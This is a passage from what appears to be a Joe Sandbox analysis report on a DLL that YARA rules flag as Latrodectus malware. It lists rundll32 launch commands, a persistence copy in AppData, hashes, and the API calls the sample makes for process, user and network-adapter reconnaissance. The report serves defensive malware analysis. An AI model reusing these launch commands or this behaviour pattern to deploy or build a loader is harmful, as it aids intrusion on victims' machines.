Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\r2iL9TLvO3.dll",#1
Imagebase:	0x7ff740e60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:39:20
Start date:	08/07/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,extra
Imagebase:	0x7ff617b80000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000003.00000003.1294422202.000001ED7A460000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:39:20
Start date:	08/07/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe "C:\Users\user\Desktop\r2iL9TLvO3.dll",#1
Imagebase:	0x7ff617b80000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:39:20
Start date:	08/07/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll", extra
Imagebase:	0x7ff617b80000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000006.00000002.2556577168.00000081943F8000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	05:39:20
Start date:	08/07/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll", extra
Imagebase:	0x7ff617b80000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	05:39:23
Start date:	08/07/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,follower
Imagebase:	0x7ff617b80000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	05:39:26
Start date:	08/07/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,run
Imagebase:	0x7ff617b80000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	31.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	18.7%
Total number of Nodes:	1023
Total number of Limit Nodes:	10

Executed Functions

Function 00007FFB1E86463C Relevance: 15.3, APIs: 10, Instructions: 291
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 00007FFB1E864666
GetCurrentProcessId.KERNEL32 ref: 00007FFB1E864673

Part of subcall function 00007FFB1E868AE0: GetUserNameA.ADVAPI32 ref: 00007FFB1E868B08
Part of subcall function 00007FFB1E868AE0: wsprintfA.USER32 ref: 00007FFB1E868B25

GetCurrentProcessId.KERNEL32 ref: 00007FFB1E864743
GetCurrentProcessId.KERNEL32 ref: 00007FFB1E86478D
OpenProcess.KERNEL32 ref: 00007FFB1E86479D
NtQueryInformationProcess.NTDLL ref: 00007FFB1E864800
ReadProcessMemory.KERNELBASE ref: 00007FFB1E864873
ReadProcessMemory.KERNELBASE ref: 00007FFB1E8648CD

Part of subcall function 00007FFB1E86AD34: NtAllocateVirtualMemory.NTDLL ref: 00007FFB1E86AD6A

WideCharToMultiByte.KERNEL32 ref: 00007FFB1E864946
FindCloseChangeNotification.KERNELBASE ref: 00007FFB1E864B2C

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: Process$CurrentMemory$Read$AllocateByteChangeCharCloseFindHandleInformationModuleMultiNameNotificationOpenQueryUserVirtualWidewsprintf
String ID:
API String ID: 2225485709-0
Opcode ID: 553234ae9dc6a36e004ee84dabc2d8032e1e0f5a123dc47589713fb678979b24
Instruction ID: 1404e84d57899f2f3c92aaaa7fd7e93b5047b60314454e43783a053fd6d55051
Opcode Fuzzy Hash: 553234ae9dc6a36e004ee84dabc2d8032e1e0f5a123dc47589713fb678979b24
Instruction Fuzzy Hash: 35F10DB190DE8685E760DB25E4543AAB3A2FB88768F500135D68D87BA9DF7CF485CB00

Function 00007FFB1E867588 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlInitUnicodeString.NTDLL ref: 00007FFB1E8675E3

Part of subcall function 00007FFB1E867414: GetFileAttributesW.KERNELBASE ref: 00007FFB1E867428

NtCreateFile.NTDLL ref: 00007FFB1E867662
NtClose.NTDLL ref: 00007FFB1E867680

Strings

@, xrefs: 00007FFB1E8675C0
0, xrefs: 00007FFB1E8675CB

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: File$AttributesCloseCreateInitStringUnicode
String ID: 0$@
API String ID: 2504508917-1545510068
Opcode ID: 76083a2609edba1498485c59019560715fe1d99402632d84a6ddf28b8a5ccd31
Instruction ID: 1da0aeeb5004f3638d751f72afca8d0fa8e31dd22af9ef9968a2154a041c8746
Opcode Fuzzy Hash: 76083a2609edba1498485c59019560715fe1d99402632d84a6ddf28b8a5ccd31
Instruction Fuzzy Hash: A921F4B2518A8187E7609F20E4543ABB7A1F7C4358F504135E6CD87AA9DF7DE849CF80

Function 00007FFB1E8677B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlInitUnicodeString.NTDLL ref: 00007FFB1E86781B
NtCreateFile.NTDLL ref: 00007FFB1E867898

Strings

0, xrefs: 00007FFB1E867803
@, xrefs: 00007FFB1E86782E

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFileInitStringUnicode
String ID: 0$@
API String ID: 2498367268-1545510068
Opcode ID: 04c235c605806e9dc8f2c28b84d8f7d6f4de585734f90aa2da62749025ce9b27
Instruction ID: e18a929870fb0d08a56a02e645c20a841475936f945756d3edc70157719a2222
Opcode Fuzzy Hash: 04c235c605806e9dc8f2c28b84d8f7d6f4de585734f90aa2da62749025ce9b27
Instruction Fuzzy Hash: A121BFB2508B8586E760DF14F45478AB7A1F384368F508229E2D987AA8CB7DE549CF40

Function 00007FFB1E868820 Relevance: 6.0, APIs: 4, Instructions: 28
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FFB1E868836
Process32FirstW.KERNEL32 ref: 00007FFB1E868862
Process32NextW.KERNEL32 ref: 00007FFB1E868880
FindCloseChangeNotification.KERNELBASE ref: 00007FFB1E86888F

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID:
API String ID: 3243318325-0
Opcode ID: 2dc8fd6175d5f81b5a57fe4cd961050eae0e2aeff7595481171681c6ca23b914
Instruction ID: de284baaa7c068cbcd57ad0ca19d6135d090268552c68b83ee7e72f3af147bb1
Opcode Fuzzy Hash: 2dc8fd6175d5f81b5a57fe4cd961050eae0e2aeff7595481171681c6ca23b914
Instruction Fuzzy Hash: 9D0167B6A18E41C3E7A0CB21E45472AB761FBC8758F440231E58D86658DF3CE606CB00

Function 00007FFB1E8668E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetAdaptersInfo.IPHLPAPI ref: 00007FFB1E866910

Part of subcall function 00007FFB1E86AD34: NtAllocateVirtualMemory.NTDLL ref: 00007FFB1E86AD6A

GetAdaptersInfo.IPHLPAPI ref: 00007FFB1E86693B

Strings

o, xrefs: 00007FFB1E86691A

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: AdaptersInfo$AllocateMemoryVirtual
String ID: o
API String ID: 2718687846-252678980
Opcode ID: ac2f8d3fbbc935a6ac9d463d0bbea8ea32726beb64fb5b3c282bee4d6846076f
Instruction ID: 7a81f8c3e8e66fe91086413bb0845561ce88b7f67977d6cf383c4164c8a30e23
Opcode Fuzzy Hash: ac2f8d3fbbc935a6ac9d463d0bbea8ea32726beb64fb5b3c282bee4d6846076f
Instruction Fuzzy Hash: 8F11E8B6908B4186E7709B25E04436AB7A1F78C7A8F440235EA8D46B68DF7CE685CF04

Function 00007FFB1E868AE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameA.ADVAPI32 ref: 00007FFB1E868B08
wsprintfA.USER32 ref: 00007FFB1E868B25

Strings

frontdesk, xrefs: 00007FFB1E868B1E, 00007FFB1E868B2B

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: NameUserwsprintf
String ID: frontdesk
API String ID: 54179028-1081972030
Opcode ID: 00ea61a6f36f2d287cf2ddfa281af9f578b78246b28b81e2290f27616a54ea60
Instruction ID: 3ca426c39de4e6c1eb056999b03bda9de25eccbf62095ebfbc1a5a42c6a85db3
Opcode Fuzzy Hash: 00ea61a6f36f2d287cf2ddfa281af9f578b78246b28b81e2290f27616a54ea60
Instruction Fuzzy Hash: 39F0ACA5A28D8392EB50AB20E8503B96362FF84754FC01031E14D565A5DF7CF60ADB40

Function 00007FFB1E86B1D4 Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82f5dfc0f4c93d1b3f6d502baa400a5d304553604fd23427375f6b58881a359c
Instruction ID: dc07f5a4a7186b1e37cd5725b4c15f64c72565385e028c2e07ee8a556ae8c204
Opcode Fuzzy Hash: 82f5dfc0f4c93d1b3f6d502baa400a5d304553604fd23427375f6b58881a359c
Instruction Fuzzy Hash: ED413D72629A8186D750DF25E48076EB7A1FBC8798F505035FA8E83B69DF3CE945CB00

Function 00007FFB1E86A350 Relevance: 4.6, APIs: 3, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: DirectorySystem
String ID:
API String ID: 2188284642-0
Opcode ID: c6e345f869e546ca9fe15d0045b6cee613ae8a71a015e53a8d63059213df4238
Instruction ID: cdce891bcc28b7c58dbfb8154f0388fc460b9d7cdf0204d6071d05bc97a534a3
Opcode Fuzzy Hash: c6e345f869e546ca9fe15d0045b6cee613ae8a71a015e53a8d63059213df4238
Instruction Fuzzy Hash: 673121A291CE8285E670DB31E94477EA366FB88374F501275E69E426E9EF3CF504C700

Function 00007FFB1E86AD34 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 00007FFB1E86AD6A

Strings

@, xrefs: 00007FFB1E86AD46

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: @
API String ID: 2167126740-2766056989
Opcode ID: 1bc704fd273e58d77e85457f0012f42626ceed0c4d95ff0d4dbaf88ef569351a
Instruction ID: c5e4a80a00303216d43e6e5b7d430594d5d95f5d0b6b4d19b49ebf601381a04c
Opcode Fuzzy Hash: 1bc704fd273e58d77e85457f0012f42626ceed0c4d95ff0d4dbaf88ef569351a
Instruction Fuzzy Hash: C7E039B2A28A8082D7409F25E45474BF361FB847B4F802321FAAD46BD8CFBCD1088F00

Function 00007FFB1E8678C0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB1E86AD34: NtAllocateVirtualMemory.NTDLL ref: 00007FFB1E86AD6A

NtReadFile.NTDLL ref: 00007FFB1E86799F

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateFileMemoryReadVirtual
String ID:
API String ID: 1637922817-0
Opcode ID: d344508d4f2c3a49d2145ecb8a5c4f55c08f83937ad1c805af4b53b3c1d0ab86
Instruction ID: 31385ccfd7b885f73d2a93d32337849d9ebc5ab963b2a5f59c7f07d345d2034f
Opcode Fuzzy Hash: d344508d4f2c3a49d2145ecb8a5c4f55c08f83937ad1c805af4b53b3c1d0ab86
Instruction Fuzzy Hash: 42212672618BC48AD760CB64E44035AB7E6F3887A0F908035EB8C83B68EF7DD454CB40

Function 00007FFB1E8679C8 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFileInitStringUnicode
String ID:
API String ID: 2498367268-0
Opcode ID: b4ce941c2864adbb6bfc33cf0ff5b1ab23669a0153671a54977759b806072ccd
Instruction ID: 83eb750f3fa063976d730e5ff59720c40afaaa32ae952e660427bb71cbcd221e
Opcode Fuzzy Hash: b4ce941c2864adbb6bfc33cf0ff5b1ab23669a0153671a54977759b806072ccd
Instruction Fuzzy Hash: D201E9B260CA41C2D630EB25E44062AB7B1FB89798F500125FACC47A59EF3EEA41CF40

Function 00007FFB1E867A54 Relevance: 1.5, APIs: 1, Instructions: 25filenativeCOMMON

Download Yara Rule

APIs

NtWriteFile.NTDLL ref: 00007FFB1E867AAB

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 13d6e9b28a46ed7aa7967ced570f62f239b9eb5f972fb27ff2d7d829580b4ea2
Instruction ID: ee3b4fba0c18d1d45adbf484d79e2135a06448f729822e285d9af020e683fe59
Opcode Fuzzy Hash: 13d6e9b28a46ed7aa7967ced570f62f239b9eb5f972fb27ff2d7d829580b4ea2
Instruction Fuzzy Hash: 52F0E77691CB9187D360DB64F44474BB7A1F788354F604125E6C982F68DBBDD1948F40

Function 00007FFB1E86378C Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL ref: 00007FFB1E8637F6

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: e5e37327634925ee1ef5c7428c8281c029602c3e86e7ce43f93336db0cdaa954
Instruction ID: cd62fd9d5d7cdbf0957b064c41ef706b1cc50fb90f17ac75bde9f96c06fae144
Opcode Fuzzy Hash: e5e37327634925ee1ef5c7428c8281c029602c3e86e7ce43f93336db0cdaa954
Instruction Fuzzy Hash: A2F04FB162CA4286E7709B20E44076A6761FBC87BCF500334F6AD46AD9DF3DE2448B00

Function 00007FFB1E867ACC Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB1E8677B0: RtlInitUnicodeString.NTDLL ref: 00007FFB1E86781B
Part of subcall function 00007FFB1E8677B0: NtCreateFile.NTDLL ref: 00007FFB1E867898

NtClose.NTDLL ref: 00007FFB1E867B2E

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseCreateFileInitStringUnicode
String ID:
API String ID: 3299502662-0
Opcode ID: 2a325927e8b0f49e9fcb8e1ef271486310447e0530a1ee6d17eb98cbba67d7f7
Instruction ID: dd630fae5a0f0818946aaa7a259a2ec077cea01937f3d7f440205b87c81360b2
Opcode Fuzzy Hash: 2a325927e8b0f49e9fcb8e1ef271486310447e0530a1ee6d17eb98cbba67d7f7
Instruction Fuzzy Hash: AFF0C9B2A08A8187D720DB25E44161ABB71F799798F400225EACC47A69DB3DE6558F40

Function 00007FFB1E867B40 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtFreeVirtualMemory.NTDLL ref: 00007FFB1E867B71

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: FreeMemoryVirtual
String ID:
API String ID: 3963845541-0
Opcode ID: 05855a3fed8d404054af5e3eef5cf0d9a8da3070589f551744240206e39a9f46
Instruction ID: b98c177195ffcd41e3c25dc545ddc7c3299d42e4a0c805b3a21d7f7aaecbecb3
Opcode Fuzzy Hash: 05855a3fed8d404054af5e3eef5cf0d9a8da3070589f551744240206e39a9f46
Instruction Fuzzy Hash: F0E0E675908E8182D7609B60E44475A7770F785374F944325E7F951AE4CF7CD14ACF01

Function 00007FFB1E8633AC Relevance: 9.2, APIs: 6, Instructions: 163
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
